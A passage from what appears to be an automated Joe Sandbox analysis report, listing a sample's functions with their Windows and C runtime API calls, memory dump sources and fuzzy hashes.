                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemShowWindow
                                                                                              • String ID:
                                                                                              • API String ID: 3351165006-0
                                                                                              • Opcode ID: 74c07520c37e512be21eb13000a05e14a24848f84aaf1ce0fdba9acdc7ad9875
                                                                                              • Instruction ID: 8fed9078b5562156c66f3303dade6a598f3f2a2b00f42fe4f3f6743404793fd9
                                                                                              • Opcode Fuzzy Hash: 74c07520c37e512be21eb13000a05e14a24848f84aaf1ce0fdba9acdc7ad9875
                                                                                              • Instruction Fuzzy Hash: 37C01236858A00BECB01ABF0DC0DE2ABBA8EBA4212F10CA08F4A6C1060C239C020DB11
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A212B3 Relevance: 3.0, APIs: 2, Instructions: 8COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,?), ref: 00A212C1
                                                                                              • KiUserCallbackDispatcher.NTDLL(00000000), ref: 00A212C8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: CallbackDispatcherItemUser
                                                                                              • String ID:
                                                                                              • API String ID: 4250310104-0
                                                                                              • Opcode ID: 9e0c9b4a310f3bb6b5aafc8338e8e2d9a28c2d06a886e185b50ebe85bdba894c
                                                                                              • Instruction ID: 4b9972c91578f20225ddff35283059354febf2b689a6f9f33129b898f29d6a4c
                                                                                              • Opcode Fuzzy Hash: 9e0c9b4a310f3bb6b5aafc8338e8e2d9a28c2d06a886e185b50ebe85bdba894c
                                                                                              • Instruction Fuzzy Hash: 98C04C76808640BFCB01ABF49D0CD2FBFB9AB94311F50CA09B5A581024C6358411DF11
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A21AD3 Relevance: 1.8, APIs: 1, Instructions: 319COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 0d8adfc7d4a9cb510d778e0e4ec541c813c34d75a4804355b211f7a00dc9a863
                                                                                              • Instruction ID: cd26c3088d8ca99241d1c8dd200762d504c65d3a5de2d9f6d112c2b92b4103fe
                                                                                              • Opcode Fuzzy Hash: 0d8adfc7d4a9cb510d778e0e4ec541c813c34d75a4804355b211f7a00dc9a863
                                                                                              • Instruction Fuzzy Hash: 42C1A274A043649FDF25CF2CD9847AD7BA5AF6A310F1801BAEC059B296CB349E44CB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A242F1 Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 2bc5333e62fb6c7e24bd8695ddca5861e7c4b305eeed804c9e8c0238390e12c7
                                                                                              • Instruction ID: 26024ded9de415cd605c8570984a3f80057ce23a7a33fd4ae199f4a63ac951cc
                                                                                              • Opcode Fuzzy Hash: 2bc5333e62fb6c7e24bd8695ddca5861e7c4b305eeed804c9e8c0238390e12c7
                                                                                              • Instruction Fuzzy Hash: 5871B2B1504B959FCB25EB78E951AE7B7E8BF19300F04093EF1AB46181DB71BA44CB11
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A290A2 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00A290A7
                                                                                                • Part of subcall function 00A213F8: __EH_prolog.LIBCMT ref: 00A213FD
                                                                                                • Part of subcall function 00A22032: __EH_prolog.LIBCMT ref: 00A22037
                                                                                                • Part of subcall function 00A2B966: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00A2B991
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog$CloseFind
                                                                                              • String ID:
                                                                                              • API String ID: 2506663941-0
                                                                                              • Opcode ID: fe4b44629f080b104ebf72156f4a7878386bd72a357cb3648b9b4a89bd261ab5
                                                                                              • Instruction ID: ae6b7743ce3933387a40ef8b82362bf6d3b6f0837fb265b8e172e6e609ef234a
                                                                                              • Opcode Fuzzy Hash: fe4b44629f080b104ebf72156f4a7878386bd72a357cb3648b9b4a89bd261ab5
                                                                                              • Instruction Fuzzy Hash: 3741D631904274AEDB24DB68E9A5AEB73B9AF10740F4401FAF58A67083DB755F88CF10
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A213FD Relevance: 1.6, APIs: 1, Instructions: 107COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00A213FD
                                                                                                • Part of subcall function 00A26891: __EH_prolog.LIBCMT ref: 00A26896
                                                                                                • Part of subcall function 00A2E298: __EH_prolog.LIBCMT ref: 00A2E29D
                                                                                                • Part of subcall function 00A2644D: __EH_prolog.LIBCMT ref: 00A26452
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 1f8073ac08535f4c8cbe05df800e5e5d03800783e0b9785d93118aab4938c689
                                                                                              • Instruction ID: 1625cb7362fa24d4d856c8b3aa6b8bc5d6650ffe0bde38b1ce1ae334060f03a9
                                                                                              • Opcode Fuzzy Hash: 1f8073ac08535f4c8cbe05df800e5e5d03800783e0b9785d93118aab4938c689
                                                                                              • Instruction Fuzzy Hash: 5E5145B19063808ECB14DF2995C02D9BBE6AF69300F1802BEEC5DCF68BD7750654CB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A213F8 Relevance: 1.6, APIs: 1, Instructions: 106COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00A213FD
                                                                                                • Part of subcall function 00A26891: __EH_prolog.LIBCMT ref: 00A26896
                                                                                                • Part of subcall function 00A2E298: __EH_prolog.LIBCMT ref: 00A2E29D
                                                                                                • Part of subcall function 00A2644D: __EH_prolog.LIBCMT ref: 00A26452
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 8d2c25aecc8d6322a932314d23fd1c35cc38d4bdbc7572e34f733bcbca153b97
                                                                                              • Instruction ID: 089d758bce9c92e256e940fd8de717559eb0a9971041cb784802e21efbc6d493
                                                                                              • Opcode Fuzzy Hash: 8d2c25aecc8d6322a932314d23fd1c35cc38d4bdbc7572e34f733bcbca153b97
                                                                                              • Instruction Fuzzy Hash: C25135B19063808ECB14DF6995C02D9BBE6AF69300F1802BEEC5DCF68BD7751654CB62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3C217 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00A3C21C
                                                                                                • Part of subcall function 00A213F8: __EH_prolog.LIBCMT ref: 00A213FD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 279b5050b3e990a78dd871c297eb8f7e5249a98f76d16d2a649cffc8625c09b3
                                                                                              • Instruction ID: 8e96fd649fab8a7fbf24a33895ed8851c16c6422147a9295bb001299b504e940
                                                                                              • Opcode Fuzzy Hash: 279b5050b3e990a78dd871c297eb8f7e5249a98f76d16d2a649cffc8625c09b3
                                                                                              • Instruction Fuzzy Hash: 61219C75C04219AFCF15EFE8D941AEEB7B4BF54314F1000AAF805B7201D7756A45EB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A4BE58 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00A4BEB8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc
                                                                                              • String ID:
                                                                                              • API String ID: 190572456-0
                                                                                              • Opcode ID: 2834e297254ff15ff241fcd271162c8609e915bf13b7d066a0ac416df3acd65c
                                                                                              • Instruction ID: dbb7833fd4fb32aacf3700ec77656790866cf38ac0585b25c08c6149e7c5cfea
                                                                                              • Opcode Fuzzy Hash: 2834e297254ff15ff241fcd271162c8609e915bf13b7d066a0ac416df3acd65c
                                                                                              • Instruction Fuzzy Hash: FA11C63BA105259F9B61DF6DDC428DB73B5EBC47207164220FE15AB254DB70EC4287E0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A2A475 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: b73b8f4222b197fc56ddfb59d8a285c73ba44499fdbe1135bc61a6f1bf7a05d4
                                                                                              • Instruction ID: 36bfc4b65ca97ddb0213dca2661dc743523eff09c1660a553cc0670fed5f4e84
                                                                                              • Opcode Fuzzy Hash: b73b8f4222b197fc56ddfb59d8a285c73ba44499fdbe1135bc61a6f1bf7a05d4
                                                                                              • Instruction Fuzzy Hash: CE11E032D006399BCB21FF6CE985AFEB375AF94700F01413AF815A7202DB74DC008A91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A2E298 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00A2E29D
                                                                                                • Part of subcall function 00A26891: __EH_prolog.LIBCMT ref: 00A26896
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 3ced653e345e468c606b01bdbd87d01d33cc09d7b26f86ff2a05baab96bedcba
                                                                                              • Instruction ID: 6177f46dc5374e47d59f405c7725cdfa5063c409286bac42f51feec3cf98c2e8
                                                                                              • Opcode Fuzzy Hash: 3ced653e345e468c606b01bdbd87d01d33cc09d7b26f86ff2a05baab96bedcba
                                                                                              • Instruction Fuzzy Hash: 0111A071E05260DEDB14EBBDA6057AEBBE8AF44300F24407EA446D3382DF749E04C721
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3EBA2 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00A3EBA7
                                                                                                • Part of subcall function 00A31983: _wcslen.LIBCMT ref: 00A31999
                                                                                                • Part of subcall function 00A28823: __EH_prolog.LIBCMT ref: 00A28828
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog$_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 2838827086-0
                                                                                              • Opcode ID: 56128bfbdacf807a4ca540efb15e0a413c3cb54ea14906d1d8f70a0236741b26
                                                                                              • Instruction ID: 3808c40dcee94c5b1f91c5a64fac81f78eb50b7fe51b7ae970d418ff71a4ce3c
                                                                                              • Opcode Fuzzy Hash: 56128bfbdacf807a4ca540efb15e0a413c3cb54ea14906d1d8f70a0236741b26
                                                                                              • Instruction Fuzzy Hash: D611C432905290AED741EBA8AD16BDC7FB4AB24360F10C06EF54853292DFB516C5CB62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A4D639 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A4C2F6: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00A4A543,00000001,00000364,?,00A45281,00000050,?,00A63070,00000200), ref: 00A4C337
                                                                                              • _free.LIBCMT ref: 00A4D6A5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap_free
                                                                                              • String ID:
                                                                                              • API String ID: 614378929-0
                                                                                              • Opcode ID: 7d30b6ea8507d2c13b34e354a80f4644266152c8881b27fa68bdf41323802f68
                                                                                              • Instruction ID: df34442d5f47f331523188916a7ff3e92455fff1affbdf989960cc54b030e0e5
                                                                                              • Opcode Fuzzy Hash: 7d30b6ea8507d2c13b34e354a80f4644266152c8881b27fa68bdf41323802f68
                                                                                              • Instruction Fuzzy Hash: 7F014977200305ABE3218F69DC41D5AFBE8FBD9330F26062DE59C83280EA70A805C778
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A26891 Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 5a3c0f0637d1d1fb5744151000e004a9ebcc8de7e0ae0db7d3d16adbce54ef85
                                                                                              • Instruction ID: 762be1791188b7c293288a20de934e70baa920bc3684df9538542f752704b1a2
                                                                                              • Opcode Fuzzy Hash: 5a3c0f0637d1d1fb5744151000e004a9ebcc8de7e0ae0db7d3d16adbce54ef85
                                                                                              • Instruction Fuzzy Hash: C70162B1641750BAD221DB299D42F9B7BE8EBC4B00F00452EB655A6282DBB02604C655
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A4C2F6 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00A4A543,00000001,00000364,?,00A45281,00000050,?,00A63070,00000200), ref: 00A4C337
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0
                                                                                              • Opcode ID: d96f0c5ae3570b54e461003d8f0692f29babc67f6514ab49bd0839c1c63f91ae
                                                                                              • Instruction ID: 1906122e621b55f2309ff573578c17a5f86dfaa5c1a139ae6cf83918a08f22d7
                                                                                              • Opcode Fuzzy Hash: d96f0c5ae3570b54e461003d8f0692f29babc67f6514ab49bd0839c1c63f91ae
                                                                                              • Instruction Fuzzy Hash: F2F0E23E606224A6DFB15F66AD06A5BB798AFC1771B24C021F81DDF090EB30F90192E5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A2644D Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00A26452
                                                                                                • Part of subcall function 00A304E5: __EH_prolog.LIBCMT ref: 00A304EA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
